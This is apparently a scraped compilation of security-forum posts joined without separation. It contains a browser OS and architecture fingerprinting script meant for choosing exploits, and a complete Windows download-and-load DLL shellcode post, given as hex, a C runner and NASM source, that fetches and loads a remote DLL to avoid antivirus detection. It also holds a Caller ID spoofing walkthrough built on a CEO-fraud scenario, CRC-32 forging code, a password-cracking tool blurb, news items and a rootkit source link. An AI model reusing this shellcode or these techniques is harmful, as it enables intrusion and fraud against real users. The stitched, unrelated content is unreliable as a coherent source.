ua_version = "5.0"; } else { ua_version = "4.0"; } switch (navigator.appMinorVersion){ case ";SP2;": ua_version += ";SP2"; break; } } } if (!os_name && navigator.platform == "Win32") { os_name = oses_windows; } //-- // Flavor //-- if (!ua_is_lying) { version = useragent.toLowerCase(); } else if (navigator.oscpu) { // Then this is Gecko and we can get at least os_name without the // useragent version = navigator.oscpu.toLowerCase(); } else { // All we have left is the useragent and we know it's lying, so don't bother version = " "; } if (!os_name || 0 == os_name.length) { if (version.indexOf("windows") != -1) { os_name = oses_windows; } else if (version.indexOf("mac") != -1) { os_name = oses_mac_osx; } else if (version.indexOf("linux") != -1) { os_name = oses_linux; } } if (os_name == oses_windows && (!os_flavor || 0 == os_flavor.length)) { if (version.indexOf("windows 95") != -1) { os_flavor = "95"; } else if (version.indexOf("windows nt 4") != -1) { os_flavor = "NT"; } else if (version.indexOf("win 9x 4.9") != -1) { os_flavor = "ME"; } else if (version.indexOf("windows 98") != -1) { os_flavor = "98"; } else if (version.indexOf("windows nt 5.0") != -1) { os_flavor = "2000"; } else if (version.indexOf("windows nt 5.1") != -1) { os_flavor = "XP"; } else if (version.indexOf("windows nt 5.2") != -1) { os_flavor = "2003"; } else if (version.indexOf("windows nt 6.0") != -1) { os_flavor = "Vista"; } else if (version.indexOf("windows nt 6.1") != -1) { os_flavor = "7"; } else if (version.indexOf("windows nt 6.2") != -1) { os_flavor = "8"; } } if (os_name == oses_linux && (!os_flavor || 0 == os_flavor.length)) { if (version.indexOf("gentoo") != -1) { os_flavor = "Gentoo"; } else if (version.indexOf("ubuntu") != -1) { os_flavor = "Ubuntu"; } else if (version.indexOf("debian") != -1) { os_flavor = "Debian"; } else if (version.indexOf("rhel") != -1) { os_flavor = "RHEL"; } else if (version.indexOf("red hat") != -1) { os_flavor = "RHEL"; } else if (version.indexOf("centos") != -1) { os_flavor = "CentOS"; } else if (version.indexOf("fedora") != -1) { os_flavor = "Fedora"; } else if (version.indexOf("android") != -1) { os_flavor = "Android"; } } //-- // Language //-- if (navigator.systemLanguage) { // ie os_lang = navigator.systemLanguage; } else if (navigator.language) { // gecko derivatives, safari, opera os_lang = navigator.language; } else { // some other browser and we don't know how to get the language, so // just guess english os_lang = "en"; } //-- // Architecture //-- if (typeof(navigator.cpuClass) != 'undefined') { // Then this is IE or Opera9+ and we can grab the arch directly switch (navigator.cpuClass) { case "x86": arch = arch_x86; break; case "x64": arch = arch_x86_64; break; } } if (!arch || 0 == arch.length) { // We don't have the handy-dandy navagator.cpuClass, so infer from // platform version = navigator.platform; //document.write(version + "\\n"); // IE 8 does a bit of wacky user-agent switching for "Compatibility View"; // 64-bit client on Windows 7, 64-bit: // Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0) // 32-bit client on Windows 7, 64-bit: // Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0) // 32-bit client on Vista, 32-bit, "Compatibility View": // Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0) // // Report 32-bit client on 64-bit OS as being 32 because exploits will // need to know the bittedness of the process, not the OS. if ( ("Win32" == version) || (version.match(/i.86/)) ) { arch = arch_x86; } else if (-1 != version.indexOf('x64') || (-1 != version.indexOf('x86_64'))) { arch = arch_x86_64; } else if (-1 != version.indexOf('PPC')) { arch = arch_ppc; } } this.ua_is_lying = ua_is_lying; this.os_name = os_name; this.os_flavor = os_flavor; this.os_sp = os_sp; this.os_lang = os_lang; this.arch = arch; this.ua_name = ua_name; this.ua_version = ua_version; this.ua_version = ua_version; return { os_name:os_name, os_flavor:os_flavor, os_sp:os_sp, os_lang:os_lang, arch:arch, ua_name:ua_name, ua_version:ua_version }; }; // function getVersion window.os_detect.searchVersion = function(needle, haystack) { var index = haystack.indexOf(needle); var found_version; if (index == -1) { return; } found_version = haystack.substring(index+needle.length+1); if (found_version.indexOf(' ') != -1) { // Strip off any junk at the end such as a CLR declaration found_version = found_version.substring(0,found_version.indexOf(' ')); } return found_version; }; /* * Return -1 if a < b, 0 if a == b, 1 if a > b */ window.ua_ver_cmp = function(ver_a, ver_ { // shortcut the easy case if (ver_a == ver_ { return 0; } a = ver_a.split("."); b = ver_b.split("."); for (var i = 0; i < Math.max(a.length, b.length); i++) { // 3.0 == 3 if (!b) { b = "0"; } if (!a) { a = "0"; } if (a == b) { continue; } a_int = parseInt(a); b_int = parseInt(b); a_rest = a.substr(a_int.toString().length); b_rest = b.substr(b_int.toString().length); if (a_int < b_int) { return -1; } else if (a_int > b_int) { return 1; } else { // == // Then we need to deal with the stuff after the ints, e.g.: // "b4pre" if (a_rest == "b" && b_rest.length == 0) { return -1; } if (b_rest == "b" && a_rest.length == 0) { return 1; } // Just give up and try a lexicographical comparison if (a_rest < b_rest) { return -1; } else if (a_rest > b_rest) { return 1; } } } // If we get here, they must be equal return 0; }; window.ua_ver_lt = function(a, { if (-1 == this.ua_ver_cmp(a,) { return true; } return false; }; window.ua_ver_gt = function(a, { if (1 == this.ua_ver_cmp(a,) { return true; } return false; }; window.ua_ver_eq = function(a, { if (0 == this.ua_ver_cmp(a,) { return true; } return false; };

The idea is simple: you can download an executable file but it can be easily detected. However, the DLLs are NOT detected (most of the time)! So it can be helpful to just download and load a library instead of downloading and executing something. The DLL can contain any code, C or something else, and it is very easy to do anything instead of writing some custom shellcode. This shellcode should work on Windows XP, Vista, 7, 8. It is 90% based on RubberDuck's "Allwin URLDownloadToFile + WinExec + ExitProcess Shellcode" shellcode available here: http://www.exploit-db.com/exploits/24318/ so all credits go to RubberDuck (Binary Flow) How it works: - Find kernel32 address from PEB - Find GetProcAddress function from kernel32 - Find LoadLibrary function using GetProcAddress - LoadLibrary("urlmon.dll") - Find URLDownloadToFile function from urlmon.dll - URLDownloadToFile("https://rstforums.com/fisiere/dead.dll", "dead.dll") - LoadLibrary("dead.dll") - Loop Shellcode and C program to test it (DETECTABLE): /* Name: Download & Load (DLL) shellcode Author: Nytro Powered by: Romanian Security Team (https://rstforums.com/forum) Based (90%) on RubberDuck's "Allwin URLDownloadToFile + WinExec + ExitProcess Shellcode" shellcode available here: http://www.exploit-db.com/exploits/24318/ Tested on: Windows XP, Windows 7, Windows 8 The shellcode downloads and loads https://rstforums.com/fisiere/dead.dll. The dead.dll library contains a simple MessageBox, but do not trust me, download it and check it yourself. */ #include "stdafx.h" #include <Windows.h> int main() { // Our shellcode unsigned char shellcode[] = "\x31\xC9\x64\x8B\x41\x30\x8B\x40\x0C\x8B\x70\x14\xAD\x96\xAD\x8B" "\x58\x10\x8B\x53\x3C\x01\xDA\x8B\x52\x78\x01\xDA\x8B\x72\x20\x01" "\xDE\x31\xC9\x41\xAD\x01\xD8\x81\x38\x47\x65\x74\x50\x0F\x85\xF0" "\xFF\xFF\xFF\x81\x78\x04\x72\x6F\x63\x41\x0F\x85\xE3\xFF\xFF\xFF" "\x81\x78\x08\x64\x64\x72\x65\x0F\x85\xD6\xFF\xFF\xFF\x8B\x72\x24" "\x01\xDE\x66\x8B\x0C\x4E\x49\x8B\x72\x1C\x01\xDE\x8B\x14\x8E\x01" "\xDA\x31\xC9\x51\x68\x2E\x64\x6C\x6C\x68\x64\x65\x61\x64\x53\x52" "\x51\x68\x61\x72\x79\x41\x68\x4C\x69\x62\x72\x68\x4C\x6F\x61\x64" "\x54\x53\xFF\xD2\x83\xC4\x0C\x59\x50\x89\x45\xFC\x51\x66\xB9\x6C" "\x6C\x51\x68\x6F\x6E\x2E\x64\x68\x75\x72\x6C\x6D\x54\xFF\xD0\x83" "\xC4\x10\x8B\x54\x24\x04\x31\xC9\x51\x66\xB9\x65\x41\x51\x31\xC9" "\x68\x6F\x46\x69\x6C\x68\x6F\x61\x64\x54\x68\x6F\x77\x6E\x6C\x68" "\x55\x52\x4C\x44\x54\x50\xFF\xD2\x31\xC9\x8D\x54\x24\x24\x51\x51" "\x52\xEB\x1F\x51\xFF\xD0\x83\xC4\x1C\x31\xC0\x50\x68\x2E\x64\x6C" "\x6C\x68\x64\x65\x61\x64\x54\x8B\x45\xFC\xFF\xD0\x90\xE9\xFA\xFF" "\xFF\xFF\xE8\xDC\xFF\xFF\xFF" "https://rstforums.com/fisiere/dead.dll" "\x00"; LPVOID lpAlloc = NULL; void (*pfunc)(); // Allocate memory (rwx) for shellcode lpAlloc = VirtualAlloc(0, 4096, MEM_COMMIT, PAGE_EXECUTE_READWRITE); if(lpAlloc == NULL) { printf("Memory isn't allocated!\n"); return 0; } // Copy memcpy(lpAlloc, shellcode, lstrlenA((LPCSTR)shellcode) + 1); pfunc = (void ())lpAlloc; // Execute pfunc(); return 0; } The shellcode assembly (NASM): bits 32 ; Find kernel32 ; ---------------------------------------------------------- xor ecx,ecx ; ECX = 0 mov eax,[fs:ecx+0x30] ; EAX = PEB mov eax,[eax+0xc] ; EAX = PEB->Ldr mov esi,[eax+0x14] ; ESI = PEB->Ldr.InMemOrder lodsd ; EAX = Second module xchg eax,esi ; EAX = ESI, ESI = EAX lodsd ; EAX = Third (kernel32) mov ebx,[eax+0x10] ; EBX = Base address mov edx,[ebx+0x3c] ; EDX = DOS->e_lfanew add edx,ebx ; EDX = PE Header mov edx,[edx+0x78] ; EDX = Offset export table add edx,ebx ; EDX = Export table mov esi,[edx+0x20] ; ESI = Offset names table add esi,ebx ; ESI = Names table xor ecx,ecx ; EXC = 0 ; Find GetProcAddress ; ---------------------------------------------------------- inc ecx ; Loop for each function lodsd add eax,ebx ; Loop untill function name cmp dword [eax],0x50746547 ; GetP jnz 0x23 cmp dword [eax+0x4],0x41636f72 ; rocA jnz 0x23 cmp dword [eax+0x8],0x65726464 ; ddre jnz 0x23 mov esi,[edx+0x24] ; ESI = Offset ordinals add esi,ebx ; ESI = Ordinals table mov cx,[esi+ecx*2] ; CX = Number of function dec ecx mov esi,[edx+0x1c] ; ESI = Offset address table add esi,ebx ; ESI = Address table mov edx,[esi+ecx*4] ; EDX = Pointer(offset) add edx,ebx ; EDX = GetProcAddress ; Find LoadLibrary ; ---------------------------------------------------------- xor ecx,ecx ; ECX = 0 push ecx push dword 0x6c6c642e ; .dll push dword 0x64616564 ; dead push ebx ; Kernel32 base address push edx ; GetProcAddress push ecx ; 0 push dword 0x41797261 ; aryA push dword 0x7262694c ; Libr push dword 0x64616f4c ; Load push esp ; "LoadLibrary" push ebx ; Kernel32 base address call edx ; GetProcAddress(LL) ; LoadLibrary("urlmon.dll"); ; ---------------------------------------------------------- add esp,byte +0xc ; pop "LoadLibrary" pop ecx ; ECX = 0 push eax ; EAX = LoadLibrary mov [ebp-4], eax ; Backup EAX; Ugly push ecx mov cx,0x6c6c ; ll push ecx push dword 0x642e6e6f ; on.d push dword 0x6d6c7275 ; urlm push esp ; "urlmon.dll" call eax ; LoadLibrary("urlmon.dll") ; Get URLDownloadToFile ; ---------------------------------------------------------- add esp,byte +0x10 ; Clean stack mov edx,[esp+0x4] ; EDX = GetProcAddress xor ecx,ecx ; ECX = 0 push ecx mov cx,0x4165 ; eA push ecx xor ecx,ecx ; ECX = 0 push dword 0x6c69466f ; oFil push dword 0x5464616f ; oadT push dword 0x6c6e776f ; ownl push dword 0x444c5255 ; URLD push esp ; "URLDownloadToFileA" push eax ; urlmon base address call edx ; GetProc(URLDown) ; Call URLDownloadToFile ; ---------------------------------------------------------- xor ecx,ecx ; ECX = 0 lea edx,[esp+0x24] ; EDX = "dead.dll" push ecx push ecx push edx ; "dead.dll" jmp short 0xF2 ; Will see push ecx ; 0 call eax ; Download ; Call LoadLibrary ; ---------------------------------------------------------- add esp, byte +0x1c ; Clean stack (URL...) xor eax, eax ; NULL push eax push dword 0x6c6c642e ; .dll push dword 0x64616564 ; dead push esp mov eax, [ebp-4] ; I know, this sucks call eax ; LoadLibrary nop jmp 0xEC ; Fuckin' loop ; Will put URL pointer on the stack as return address (call) call dword 0xD3 url db "https://rstforums.com/fisiere/dead.dll", 0 Important Note! It may not work on all Windows 7 & Windows 8 operating systems due to some stupidities related to the Internet Explorer settings! For example, on some Windows 8 versions the URLDownloadToFile didn't work until IE was the default browser. On some Windows 7 versions it didn't work until the IE settings were reset, but it worked even if IE was not the default browser. The problem is with URLDownloadToFile, not with the shellcode. If you have any questions, you can ask me here. Thanks, Nytro

Probabil nu. E pentru cei din Bucuresti.

OWASP Romania InfoSec Conference 2014 Sunteti invitati la urmatorul eveniment OWASP al capitolului din Romania. OWASP Romania InfoSec Conference 2014 va fi o conferinta de o zi cu prezentari pe teme de securitate IT si va avea loc in data de 24 octombrie. Detaliile vor fi publicate aici: https://www.owasp.org/index.php/OwaspRomaniaConference2014 Call For Presentations este deschis pana pe 30 septembrie 2014. Asteptam inscrieri pentru prezentari sau workshop-uri din urmatoarele arii si nu numai: • Security aspects of new / emerging web technologies / paradigms / languages / frameworks • Secure development: frameworks, best practices, secure coding, methods, processes, SDLC, etc. • Security of web frameworks (Struts, Spring, ASP.Net MVC, RoR, etc) • Vulnerability analysis (code review, pentest, static analysis etc) • Threat modelling of applications • Mobile security and security for the mobile web • Cloud security • Browser security and local storage • Countermeasures for application vulnerabilities • New technologies, paradigms, tools • Application security awareness and education • Security in web services, REST, and service oriented architectures • Privacy in web apps, Web services and data storage Vor fi selectate prezentarile si temele cele mai interesante. Inregistrarea prezentarilor se realizeaza aici. Important: termenul limita pentru inscrierea prezentarilor este 30 septembrie lista speakerilor confirmati va fi anuntata pe 1 octombrie conferinta va avea loc pe 24 octombrie prezentarile vor avea durata de 45 de minute fiecare va exista un speaker agreement Info: https://www.owasp.org/index.php/OwaspRomaniaConference2014

Caller ID Spoofing When conducting a VoIP security assessment against a PBX (Private Branch Exchange) it is important to perform tests against all the type of attacks. One of the attacks that exist for years in VoIP is called Caller ID spoofing and we are going to examine it in this article.Caller ID spoofing is a type of attack where a malicious attacker will impersonate a legitimate SIP user to call other legitimate users on the voice network. The implementation of this attack is fairly easy and it can be achieved with the use of the following tools: Metasploit Viproy Inviteflood Let’s see the details of this attack below. Attack Scenario An internal attacker is calling the Director of Finance of the company by pretending that he is the CEO and he is requesting to transfer X amount of money to his bank account. The attacker is changing the header of the SIP INVITE request in order to spoof his caller ID to CEO. The Director of Finance accepts the call as the caller ID seems to be from CEO which is considered trusted and initiates the phone conversation with the attacker. Scenario The crafted malformed SIP INVITE message can be seen below: Now let’s see how this type of attack can be conducted with the use of various tools. Viproy Viproy is penetration testing toolkit for VoIP assessments. It has been developed by Fatih Ozavci and it can be loaded to the Metasploit Framework. There is a specific module that can be used for Caller ID spoofing and in the image below you can see the configuration of the module: Spoofing the Caller ID with Viproy This will cause the phone device to ring with the custom message of our choice even from phone extensions that are not valid. Spoofed Call – Viproy Inviteflood Spoofed INVITE requests can be sent and from another tool which is called inviteflood and it is part of the Kali Linux. The main purpose of inviteflood is to be used for DoS (Denial of Service) attacks against SIP devices by sending multiple INVITE requests but it can accommodate our need to spoof our ID with the following command: Caller ID Spoofing – Inviteflood The next image is showing the output and as we can see the phone is ringing with the ID of the CEO as per our scenario above. Spoofed Call with the ID of CEO Metasploit Metasploit framework contains as well an existing module which can send a fake SIP INVITE message to an existing extension: Fake INVITE – Metasploit The device will ring with the following message: Spoofed Caller ID – Metasploit Conclusion In order for the attack to be successful the PBX needs to allow anonymous inbound SIP calls. It is very easy to be implemented even from people with limited knowledge about VoIP and hacking that’s why systems owners need to ensure that their PBX’s prevents anonymous inbound calls to reach their legitimate users in order to mitigate the risk of this attack. Sursa: Caller ID Spoofing | Penetration Testing Lab

[h=3]CRC-32 forging[/h]You may already know that the CRC-32 of any text can be forged if you can add 4 bytes anywhere in the text. See anarchriz's paper on the subject. A real-world example of such a situation can be seen in JB's ESET CONFidence Crackme Writeup. Good code that I recently used it in another situation, in order to forge a text of a given CRC-32 by inserting 4 bytes at a specific position. Since I reused most of his code, let's share mine as well (crc32.py): #!/usr/bin/env pythonfrom struct import pack,unpack # Poly in "reversed" notation -- http://en.wikipedia.org/wiki/Cyclic_redundancy_check POLY = 0xedb88320 # CRC-32-IEEE 802.3 #POLY = 0x82F63B78 # CRC-32C (Castagnoli) #POLY = 0xEB31D82E # CRC-32K (Koopman) #POLY = 0xD5828281 # CRC-32Q def build_crc_tables(): for i in range(256): fwd = i rev = i << 24 for j in range(8, 0, -1): # build normal table if (fwd & 1) == 1: fwd = (fwd >> 1) ^ POLY else: fwd >>= 1 crc32_table = fwd & 0xffffffff # build reverse table =) if rev & 0x80000000 == 0x80000000: rev = ((rev ^ POLY) << 1) | 1 else: rev <<= 1 rev &= 0xffffffff crc32_reverse = rev crc32_table, crc32_reverse = [0]*256, [0]*256 build_crc_tables() def crc32(s): # same crc32 as in (binascii.crc32)&0xffffffff crc = 0xffffffff for c in s: crc = (crc >> 8) ^ crc32_table[(crc ^ ord©) & 0xff] return crc^0xffffffff def forge(wanted_crc, str, pos=None): if pos is None: pos = len(str) # forward calculation of CRC up to pos, sets current forward CRC state fwd_crc = 0xffffffff for c in str[:pos]: fwd_crc = (fwd_crc >> 8) ^ crc32_table[(fwd_crc ^ ord©) & 0xff] # backward calculation of CRC up to pos, sets wanted backward CRC state bkd_crc = wanted_crc^0xffffffff for c in str[pos:][::-1]: bkd_crc = ((bkd_crc << 8)&0xffffffff) ^ crc32_reverse[bkd_crc >> 24] ^ ord© # deduce the 4 bytes we need to insert for c in pack('<L',fwd_crc)[::-1]: bkd_crc = ((bkd_crc << 8)&0xffffffff) ^ crc32_reverse[bkd_crc >> 24] ^ ord© res = str[:pos] + pack('<L', bkd_crc) + str[pos:] assert(crc32(res) == wanted_crc) return res Given a text, a CRC-32 and a position, you can forge a new text having this exact CRC-32 by inserting 4 bytes at the indicated position: >>> str = "some text">>> wanted_crc = 0xdeadbeef >>> for pos in range(len(str)): f = forge(wanted_crc, str, pos) print "%-30r CRC32 0x%08x" % (f, crc32(f)) '^q\xb4\x19some text' CRC32 0xdeadbeef 's\x04\xe8\xc66ome text' CRC32 0xdeadbeef 'so8~V\xb5me text' CRC32 0xdeadbeef 'som\x05\xf3\xb4ve text' CRC32 0xdeadbeef 'some\xab\xd5\xc4( text' CRC32 0xdeadbeef 'some }\x9eBZtext' CRC32 0xdeadbeef 'some t:\xfa\x86\rext' CRC32 0xdeadbeef 'some te\x9f\xca\xd9\x9ext' CRC32 0xdeadbeef 'some tex\x11\xae\xf0Ft' CRC32 0xdeadbeef Thanks JB Other CRC-32 resources: crctools by Julien Tinnes, libcrc by Y. Guillot, among others. Posted by StalkR at 20:15 Sursa: StalkR's Blog: CRC-32 forging

[TABLE] [TR] [TD][TABLE=width: 100%] [TR] [TD]Oracle Password Auditor is the FREE Oracle database password recovery and auditing software.[/TD] [/TR] [/TABLE] [/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD] It not only helps you to recover lost or forgotten Oracle database password but also audit Oracle database setup in an corporate environment by discovering the weak password configurations. During auditing operation, it detects special cases such as Account Lockout, Incorrect Oracle SID, Session Limit problems etc. In such cases it stops the operation rather than blindly continuing with the errors. Penetration testers can use this feature to detect any account lockout issues and further verify if it is susceptible to such DDOS attacks. It uses simple & faster dictionary based password recovery method. Also in the beginning it can automatically check for well known default user/password combinations. It is very easy to use with a cool GUI interface and a handy tool for IT administrators & Penetration Testers. It works on wide range of platforms starting from Windows XP to Windows 8.[/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD=class: page_subheader] Features[/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD] Quickly Audit or Recover Your Lost Oracle Password. Dictionary based Password Recovery method Automatically Checks for Default User/Password combinations Includes dictionary file having popular list of default Oracle passwords Free and easy to use tool Very useful for IT administrators & Penetration Testers Automatically detects Account Lockout, Invalid SID, Session Limit problems. Displays detailed statistics during the operation. Integrated Installer for local Installation & Uninstallation. [/TD] [/TR] [TR] [TD][/TD] [/TR] [/TABLE] [TABLE] [TR] [TD=class: page_subheader]Screenshots[/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD]Screenshot 1:Oracle Password Auditor is showing the recovered Oracle Password[/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD=align: center] [/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD]Screenshot 2:Oracle Password Auditor is detecting the locked out account and stopping the operation.[/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD=align: center][/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD=class: page_subheader] Release History[/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD] [TABLE=width: 90%, align: center] [TR] [TD=class: page_sub_subheader]Version 2.5 : 19th Jul 2014[/TD] [/TR] [TR] [TD]Auto copy the Oracle login password to clipboard on success. Improved UI interface with glowing icons and fixed few minor bugs.[/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD=class: page_sub_subheader]Version 2.0 : 30th May 2013[/TD] [/TR] [TR] [TD]Mega edition with support for Windows 8. Includes new features like default passwords check in the beginning, optimized oracle password auditing technique and enhanced GUI interface.[/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD=class: page_sub_subheader]Version 1.0 : 13th July 2011[/TD] [/TR] [TR] [TD]First public release of OraclePasswordAuditor[/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD][/TD] [/TR] [/TABLE] [/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD=class: page_subheader]Download[/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD] [TABLE=width: 95%, align: center] [TR] [TD] FREE Download Oracle Password Auditor v2.5 License : Freeware Platform : Windows XP, 2003, Vista, Windows 7, Windows 8 Download [/TD] [/TR] [/TABLE] [/TD] [/TR] [TR] [TD][/TD] [/TR] [/TABLE] Sursa: Oracle Password Auditor : Free Oracle Password Recovery & Auditing Tool

Firefox adds anti-malware file reputation service Summary: Firefox has blocked known phishing and malware sites for some time. Now it will check reputation on individual files and soon use file signatures. By Larry Seltzer for Zero Day | July 25, 2014 -- 12:40 GMT (05:40 PDT) Mozilla has announced that the new version 31.0 of Firefox, released earlier this week, will check individual file downloads against Google's Safe Browsing reputation service to determine if they are known malware. Firefox has checked web site URLs against Google's Safe Browsing service since version 2.0. Originally, that service checked only to see if sites were known phishing sites; later on, a list of sites known to serve malware was added to the service. When you encounter such a site, Firefox raises an interstitial warning: Version 31.0 adds a new feature. If, during a download, the site passes reputation check, then before completion Firefox will send a SHA-256 hash of the file to Google's Safe Browsing Service, which maintains a database of them. This file reputation service is not a documented part of the Safe Browsing API, but Google has given Firefox access to it. Obviously Google Chrome has had access to this file reputation service since Google launched it in 2012. Firefox also announced that version 32, due in September, will add a new efficiency to malware checks. Before checking the reputation of an individual file with Safe Browsing, it will check the file's digital signature (if it has one) for validity and to see if the publisher is in a local list of known-trusted publishers. If it passes this test, then the file is deemed good. If not, Firefox proceeds with the file reputation check. If you want to turn this service off, you may do so in "Preferences > Security > Block reported attack sites." Note that this setting controls not just the site check (as the name implies) but also the individual file tests. To turn off just the individual file tests, replace browser.safebrowsing.appRepURL in about:config with an empty string (the default setting is https://sb-ssl.google.com/safebrowsing/clientreport/download?key=%GOOGLE_API_KEY%). Microsoft Windows SmartScreen service has checked for phishing and malicious web sites in Internet Explorer for some time. With Windows 8, Microsoft added file reputation checking to the service. Sursa: Firefox adds anti-malware file reputation service | ZDNet

The Apple backdoor that wasn't Summary: On Monday, several media outlets mistakenly reported that Apple had installed "backdoors" on millions of iPhones and iOS devices. UPDATED. By Violet Blue for Zero Day | July 25, 2014 -- 12:05 GMT (05:05 PDT) Before the iPhone came out, and long before anyone heard the name "Ed Snowden," the most common use of the word "backdoor" was relegated to an industry that applied the term as a colorful anatomical descriptive, helping potential customers select the preferred access point for their adult entertainment. Last weekend, a hacker who's been campaigning to make a point about Apple security by playing fast and loose with the now widely-accepted definition of "backdoor" struck gold when journalists didn't do their homework and erroneously reported a diagnostic mechanism as a nefarious, malfeasant, secret opening to their private data. Speaking at the Hackers On Planet Earth conference in New York, Jonathan Zdziarski said that Apple’s iOS contains intentionally created access that could be used by governments to spy on iPhone and iPad users to access a user's address book, photos, voicemail and any accounts configured on the device. As he has been doing since the Snowden documents started making headlines last year, Mr. Zdziarski re-cast Apple's developer diagnostics kit in a new narrative, turning a tool that could probably gain from better user security implementation into a sinister "backdoor." The "Apple installed backdoors on millions of devices" story is still making headlines, despite the fact that respected security researchers started debunking researcher Jonathan Zdziarski's claims the minute people started tweeting about his HopeX talk on Sunday. Since Mr. Zdziarski presented "Identifying back doors, attack points, and surveillance mechanisms in iOS devices", his miscasting of Apple's developer diagnostics as a "backdoor" was defeated on Twitter, debunked and saw SourceClear calling Zdziarski an attention seeker in Computerworld, and Apple issued a statement saying that no, this is false. In fact, this allegedly "secret backdoor" was added to diagnostic information that has been as freely available as a page out of a phone book since 2002. The packet capture software used for diagnostics referenced by Mr. Zdziarski in support of his claims is similar in functionality as the one that's installed on every Apple laptop and desktop computer for diagnostics. So his numbers of "backdoors" allegedly installed by Apple for wide-ranging nefarious purposes are off by like, a billion. It appears that no one reporting Zdziarski's claims as fact attended his talk, watched it online, and less than a handful fact-checked or consulted outside experts. Which is, incidentally, what I did. I saw the talk begin to gain momentum on Twitter, then quickly flushed the idea of a story when the researchers I consulted kindly told me there was no "there" there. Mind you, I'm quick to call Apple on its issues. Among many other articles about Apple security vulns and hacks, I was first to report seeing an iPhone getting hacked in 60 seconds with a malicious charger, and when Apple said that intercepting (and spoofing) iMessage was only "theoretical" I provided video proof of the exploit. Regardless of the problems with Mr. Zdziarski's sermon, the (incorrect) assertion that Apple installed backdoors for law enforcement access was breathlessly reported this week by The Guardian, Forbes, Times of India, The Register, Ars Technica, MacRumors, Cult of Mac, Apple Insider, InformationWeek, Read Write Web, Daily Mail and many more (including ZDNet). People were told to essentially freak out over iPhones allowing people who know the passcode and pairing information to use the device. If you're the kind of person that walks into a public library, plugs in your iPhone and gives the public computer and every rando who accesses it permission to access everything on your phone forever, then okay, maybe you should freak out. The entire incident has cemented mistrust about journalists in infosec communities, and their reactions to the media mess hasn't been kind. Sursa: The Apple backdoor that wasn't | ZDNet

Low Level IPhone programming Video from JailbreakCon Twitter: @JailbreakCon - http://twitter.com/JailbreakCon “Low Level iPhone Programming (And more!)” by winocm [remotely, via FaceTime Voice, with Steven De Franco (iH8sn0w) on stage to help] Slides: Presentation1.pdf Sursa: Low Level IPhone programming

[h=1]SSDT PROcess and protect rootkit[/h]Started By x4r0r, Apr 20 2014 01:41 AM Hello to all especially to zwclose7 share has come from the following code developed ... everything is complete without no problem .... it is detected by some antivirus few knew it and its function is very important to us if someone encourages has improved works in Windows 7 32-bit Windows 8 32-bit and 64-bit here i leave all the details works all windows 32/64 bit Download: files.cnblogs.com/yeerh/HookDemo_SSDT.7z Sursa: SSDT PROcess and protect rootkit - Source Codes - rohitab.com - Forums